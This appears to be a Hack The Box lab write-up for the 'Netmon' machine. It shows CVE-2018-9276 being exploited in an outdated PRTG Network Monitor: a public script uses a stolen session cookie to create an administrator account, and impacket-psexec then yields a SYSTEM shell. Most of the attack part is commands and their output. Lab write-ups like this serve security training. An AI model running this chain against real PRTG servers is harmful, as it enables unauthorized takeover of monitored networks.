OS Command Injection
The target system is hosting an outdated instance of PRTG Network Monitor. A misconfigured FTP server led me to extract the credential for the web application, and I was able to authenticate to it. i then [[netmon_cve-2018-9276#cve-2018-9276|confirmed]] the vulnerability and found an [[Netmon_CVE-2018-9276#Exploit|exploit]]
┌──(kali㉿kali)-[~/archive/htb/labs/netmon]
└─$ ./CVE-2018-9276.sh
[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution [*]
[+]#########################################################################[+]
[*] date: 11/03/2019 [*]
[+]#########################################################################[+]
[*] author: https://github.com/M4LV0 lorn3m4lvo@protonmail.com [*]
[+]#########################################################################[+]
[*] vendor homepage: https://www.paessler.com/prtg [*]
[*] version: 18.2.38 [*]
[*] cve: CVE-2018-9276 [*]
[*] reference: https://www.codewatch.org/blog/?p=453 [*]
[+]#########################################################################[+]
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'
[+]#########################################################################[+]
example usage: ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1" Running the exploit itself shows the usage.
It looks like I’m supposed to supply the web cookie to the -c flag
I will grab that; _ga=GA1.4.1734379368.1680689615; _gid=GA1.4.1195484187.1680689615; OCTOPUS1813713946=e0E2NTkzRkFBLTVDNTktNDIwNS1COEIwLUUwMEMxNTg5NkM2Nn0%3D
┌──(kali㉿kali)-[~/archive/htb/labs/netmon]
└─$ ./cve-2018-9276.sh -u http://$IP -c '_ga=GA1.4.1734379368.1680689615; _gid=GA1.4.1195484187.1680689615; OCTOPUS1813713946=e0E2NTkzRkFBLTVDNTktNDIwNS1COEIwLUUwMEMxNTg5NkM2Nn0%3D'
[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution [*]
[+]#########################################################################[+]
[*] date: 11/03/2019 [*]
[+]#########################################################################[+]
[*] author: https://github.com/M4LV0 lorn3m4lvo@protonmail.com [*]
[+]#########################################################################[+]
[*] vendor homepage: https://www.paessler.com/prtg [*]
[*] version: 18.2.38 [*]
[*] cve: CVE-2018-9276 [*]
[*] reference: https://www.codewatch.org/blog/?p=453 [*]
[+]#########################################################################[+]
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'
[+]#########################################################################[+]
[*] file created
[*] sending notification wait....
[*] adding a new user 'pentest' with password 'P3nT3st'
[*] sending notification wait....
[*] adding a user pentest to the administrators group
[*] sending notification wait....
[*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun! Launching the exploit.
it should have now created a local admin account; pentest:P3nT3st!
Since the target system has a WinRM service hosting, I can use that to gain a foothold
or
┌──(kali㉿kali)-[~/archive/htb/labs/netmon]
└─$ impacket-psexec 'pentest:P3nT3st!@$IP' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file gGsJArmm.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service ZEEv on 10.10.10.152.....
[*] Starting service ZEEv.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
netmon
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::1a
ipv6 address. . . . . . . . . . . : dead:beef::c81c:b924:b7e5:558
link-local ipv6 address . . . . . : fe80::c81c:b924:b7e5:558%3
ipv4 address. . . . . . . . . . . : 10.10.10.152
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%3
10.10.10.2
tunnel adapter isatap.{a764ae58-73c4-468a-b78d-4878fecefc66}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : htbSystem Level Compromise